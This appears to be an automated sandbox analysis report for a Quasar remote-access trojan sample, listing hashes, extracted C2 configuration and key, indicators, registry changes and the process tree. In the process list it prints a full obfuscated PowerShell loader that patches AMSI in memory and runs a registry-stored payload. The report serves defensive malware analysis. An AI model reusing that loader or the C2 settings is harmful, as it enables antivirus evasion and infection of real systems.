Analysis
-
max time kernel
143s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
23-04-2024 20:29
Behavioral task
behavioral1
Sample
real.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
real.exe
Resource
win10v2004-20240226-en
Errors
General
-
Target
real.exe
-
Size
409KB
-
MD5
16be7896ffd96f3c15ca40ff3243674f
-
SHA1
321e82e120535d5f48430284804d5aca5f78d8c7
-
SHA256
e297f022413aee60290878fd253b68ecb9af7e7919ddae6093a977c10b47ca07
-
SHA512
6dda93f0e4e47caf40bf15372fd8edee36b8a66d4d6ee3a6e1400c9297cbaa32584c6f8c97e2e76c4e3cd8b195d8e9cbb898870559e7a7177db97eb8c0a521ad
-
SSDEEP
12288:8Bwz9Fx/nIlyLcnRKIZduz8IWQygCLZG9:8+J0sLYpuz8bQygB
Malware Config
Extracted
quasar
3.1.5
RSlaves
147.185.221.19:33587
$Sxr-hphEGEvqSUG7C0u46T
-
encryption_key
6jSzwDnfbfYdZp3ml07G
-
install_name
WDefenderUpdater.exe
-
log_directory
UpdLog
-
reconnect_delay
3000
-
startup_key
WindowsBIOSupd
-
subdirectory
Microsoft
Signatures
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/memory/2252-1-0x0000000000270000-0x00000000002DC000-memory.dmp family_quasar behavioral2/files/0x000800000002325c-11.dat family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1492 created 612 1492 powershell.EXE 5 -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 3256 WDefenderUpdater.exe 1396 Install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 21 raw.githubusercontent.com 22 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 ip-api.com -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1492 set thread context of 2944 1492 powershell.EXE 105 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 620 schtasks.exe 1156 SCHTASKS.exe 2304 schtasks.exe -
Modifies data under HKEY_USERS 52 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1492 powershell.EXE 1492 powershell.EXE 1492 powershell.EXE 1492 powershell.EXE 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 5068 svchost.exe 5068 svchost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe 2944 dllhost.exe -
Suspicious behavior: LoadsDriver 64 IoCs
pid Process 3384 Process not Found 4060 Process not Found 4448 Process not Found 4052 Process not Found 2296 Process not Found 4696 Process not Found 796 Process not Found 3344 Process not Found 3652 Process not Found 4828 Process not Found 3956 Process not Found 764 Process not Found 4540 Process not Found 2404 Process not Found 3916 Process not Found 3080 Process not Found 2244 Process not Found 3896 Process not Found 3284 Process not Found 3696 Process not Found 3920 Process not Found 2696 Process not Found 1196 Process not Found 1728 Process not Found 4428 Process not Found 432 Process not Found 1396 Process not Found 2396 Process not Found 4176 Process not Found 2904 Process not Found 3424 Process not Found 688 Process not Found 1200 Process not Found 2452 Process not Found 1604 Process not Found 4012 Process not Found 3092 Process not Found 1996 Process not Found 2772 Process not Found 3740 Process not Found 1808 Process not Found 4924 Process not Found 708 Process not Found 4204 Process not Found 2384 Process not Found 3448 Process not Found 4120 Process not Found 700 Process not Found 2208 Process not Found 892 Process not Found 696 Process not Found 4700 Process not Found 3716 Process not Found 900 Process not Found 2012 Process not Found 2376 Process not Found 1384 Process not Found 3128 Process not Found 3356 Process not Found 4480 Process not Found 2292 Process not Found 1388 Process not Found 2652 Process not Found 3020 Process not Found -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2252 real.exe Token: SeDebugPrivilege 1492 powershell.EXE Token: SeDebugPrivilege 3256 WDefenderUpdater.exe Token: SeDebugPrivilege 1492 powershell.EXE Token: SeDebugPrivilege 2944 dllhost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3256 WDefenderUpdater.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2252 wrote to memory of 620 2252 real.exe 92 PID 2252 wrote to memory of 620 2252 real.exe 92 PID 2252 wrote to memory of 620 2252 real.exe 92 PID 2252 wrote to memory of 3256 2252 real.exe 94 PID 2252 wrote to memory of 3256 2252 real.exe 94 PID 2252 wrote to memory of 3256 2252 real.exe 94 PID 2252 wrote to memory of 1396 2252 real.exe 95 PID 2252 wrote to memory of 1396 2252 real.exe 95 PID 2252 wrote to memory of 1396 2252 real.exe 95 PID 2252 wrote to memory of 1156 2252 real.exe 96 PID 2252 wrote to memory of 1156 2252 real.exe 96 PID 2252 wrote to memory of 1156 2252 real.exe 96 PID 3256 wrote to memory of 2304 3256 WDefenderUpdater.exe 100 PID 3256 wrote to memory of 2304 3256 WDefenderUpdater.exe 100 PID 3256 wrote to memory of 2304 3256 WDefenderUpdater.exe 100 PID 1492 wrote to memory of 2944 1492 powershell.EXE 105 PID 1492 wrote to memory of 2944 1492 powershell.EXE 105 PID 1492 wrote to memory of 2944 1492 powershell.EXE 105 PID 1492 wrote to memory of 2944 1492 powershell.EXE 105 PID 1492 wrote to memory of 2944 1492 powershell.EXE 105 PID 1492 wrote to memory of 2944 1492 powershell.EXE 105 PID 1492 wrote to memory of 2944 1492 powershell.EXE 105 PID 1492 wrote to memory of 2944 1492 powershell.EXE 105 PID 2944 wrote to memory of 612 2944 dllhost.exe 5 PID 2944 wrote to memory of 672 2944 dllhost.exe 7 PID 2944 wrote to memory of 940 2944 dllhost.exe 12 PID 672 wrote to memory of 2804 672 lsass.exe 48 PID 2944 wrote to memory of 1020 2944 dllhost.exe 13 PID 2944 wrote to memory of 512 2944 dllhost.exe 14 PID 672 wrote to memory of 2804 672 lsass.exe 48 PID 672 wrote to memory of 2804 672 lsass.exe 48 PID 2944 wrote to memory of 856 2944 dllhost.exe 15 PID 672 wrote to memory of 2804 672 lsass.exe 48 PID 2944 wrote to memory of 1060 2944 dllhost.exe 16 PID 672 wrote to memory of 2804 672 lsass.exe 48 PID 672 wrote to memory of 2804 672 lsass.exe 48 PID 672 wrote to memory of 2804 672 lsass.exe 48 PID 2944 wrote to memory of 1068 2944 dllhost.exe 17 PID 672 wrote to memory of 2804 672 lsass.exe 48 PID 2944 wrote to memory of 1184 2944 dllhost.exe 19 PID 2944 wrote to memory of 1232 2944 dllhost.exe 20 PID 2944 wrote to memory of 1288 2944 dllhost.exe 21 PID 672 wrote to memory of 2804 672 lsass.exe 48 PID 2944 wrote to memory of 1312 2944 dllhost.exe 22 PID 2944 wrote to memory of 1344 2944 dllhost.exe 23 PID 672 wrote to memory of 2804 672 lsass.exe 48 PID 2944 wrote to memory of 1412 2944 dllhost.exe 24 PID 1412 wrote to memory of 4992 1412 svchost.exe 117 PID 1412 wrote to memory of 4992 1412 svchost.exe 117 PID 2944 wrote to memory of 1428 2944 dllhost.exe 25 PID 1412 wrote to memory of 3184 1412 svchost.exe 119 PID 1412 wrote to memory of 3184 1412 svchost.exe 119 PID 2944 wrote to memory of 1548 2944 dllhost.exe 26 PID 2944 wrote to memory of 1568 2944 dllhost.exe 27 PID 1412 wrote to memory of 4644 1412 svchost.exe 120 PID 1412 wrote to memory of 4644 1412 svchost.exe 120 PID 2944 wrote to memory of 1676 2944 dllhost.exe 28 PID 1412 wrote to memory of 2300 1412 svchost.exe 121 PID 1412 wrote to memory of 2300 1412 svchost.exe 121 PID 2944 wrote to memory of 1684 2944 dllhost.exe 29 PID 1412 wrote to memory of 4824 1412 svchost.exe 122 PID 1412 wrote to memory of 4824 1412 svchost.exe 122 PID 2944 wrote to memory of 4824 2944 dllhost.exe 122 PID 2944 wrote to memory of 1736 2944 dllhost.exe 30
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1020
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{4dfd0b84-b9cc-4a07-90a1-3900675b54d6}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2944
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:940
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:512
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:856
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1068
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1184
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:EHPlHoExkbpM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$abgQYdBhaIHkiH,[Parameter(Position=1)][Type]$ZbNTSnPlay)$HfOubaUvoTY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+'t'+''+[Char](101)+'dD'+'e'+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+'e'+'m'+''+'o'+''+[Char](114)+'y'+'M'+''+[Char](111)+'du'+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+','+''+'P'+''+'u'+''+'b'+'l'+[Char](105)+''+[Char](99)+''+','+'S'+'e'+'a'+[Char](108)+'e'+[Char](100)+''+','+'An'+'s'+''+'i'+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+'C'+[Char](108)+'a'+'s'+''+[Char](115)+'',[MulticastDelegate]);$HfOubaUvoTY.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+'p'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+'id'+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$abgQYdBhaIHkiH).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+'e'+'d'+'');$HfOubaUvoTY.DefineMethod(''+[Char](73)+''+'n'+''+'v'+''+[Char](111)+'k'+[Char](101)+'',''+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+'i'+''+'g'+',N'+'e'+''+[Char](119)+''+'S'+'l'+[Char](111)+''+'t'+''+','+''+[Char](86)+''+[Char](105)+''+'r'+'t'+[Char](117)+''+'a'+''+[Char](108)+'',$ZbNTSnPlay,$abgQYdBhaIHkiH).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+'t'+''+'i'+''+[Char](109)+'e,'+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $HfOubaUvoTY.CreateType();}$hKTblyIbbkrGH=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+'m'+''+'.'+'d'+'l'+''+'l'+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+''+'n'+'32.'+[Char](85)+''+'n'+''+'s'+'a'+[Char](102)+'e'+'N'+''+'a'+''+'t'+''+[Char](105)+'v'+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$nIJnJpYHmZgNyT=$hKTblyIbbkrGH.GetMethod(''+'G'+''+'e'+''+'t'+'P'+[Char](114)+''+'o'+'c'+[Char](65)+'d'+'d'+''+'r'+''+[Char](101)+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+'St'+[Char](97)+''+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$QjvmqNPqzWfHyjaBHBC=EHPlHoExkbpM @([String])([IntPtr]);$YymLpvMmHfjdOogVFXHmau=EHPlHoExkbpM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$nDGIYExpcws=$hKTblyIbbkrGH.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+'d'+[Char](117)+''+'l'+''+[Char](101)+'Ha'+'n'+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+'l'+[Char](108)+'')));$GAYfemNzojWOWb=$nIJnJpYHmZgNyT.Invoke($Null,@([Object]$nDGIYExpcws,[Object](''+'L'+'o'+'a'+'dLib'+[Char](114)+''+'a'+''+[Char](114)+'yA')));$sFHXAloiXgapowrbG=$nIJnJpYHmZgNyT.Invoke($Null,@([Object]$nDGIYExpcws,[Object](''+'V'+''+'i'+''+'r'+'tua'+[Char](108)+'Pr'+'o'+''+[Char](116)+''+[Char](101)+''+'c'+'t')));$GcBDcET=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GAYfemNzojWOWb,$QjvmqNPqzWfHyjaBHBC).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$FrSQierqEPrAdmiXA=$nIJnJpYHmZgNyT.Invoke($Null,@([Object]$GcBDcET,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+''+'B'+''+'u'+'ff'+[Char](101)+''+[Char](114)+'')));$lmIDGcCYaC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sFHXAloiXgapowrbG,$YymLpvMmHfjdOogVFXHmau).Invoke($FrSQierqEPrAdmiXA,[uint32]8,4,[ref]$lmIDGcCYaC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$FrSQierqEPrAdmiXA,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sFHXAloiXgapowrbG,$YymLpvMmHfjdOogVFXHmau).Invoke($FrSQierqEPrAdmiXA,[uint32]8,0x20,[ref]$lmIDGcCYaC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOF'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+'7'+[Char](55)+'s'+'t'+'a'+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1492
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1288
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1344
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2452
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:4992
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:3184
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:4644
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2300
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:4824
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1548
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1568
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1676
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1684
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1784
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1884
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1896
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2000
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2040
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1632
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2188
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2500
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2732
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:2820
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2852
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2860
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3316
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:5072
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
PID:1944
-
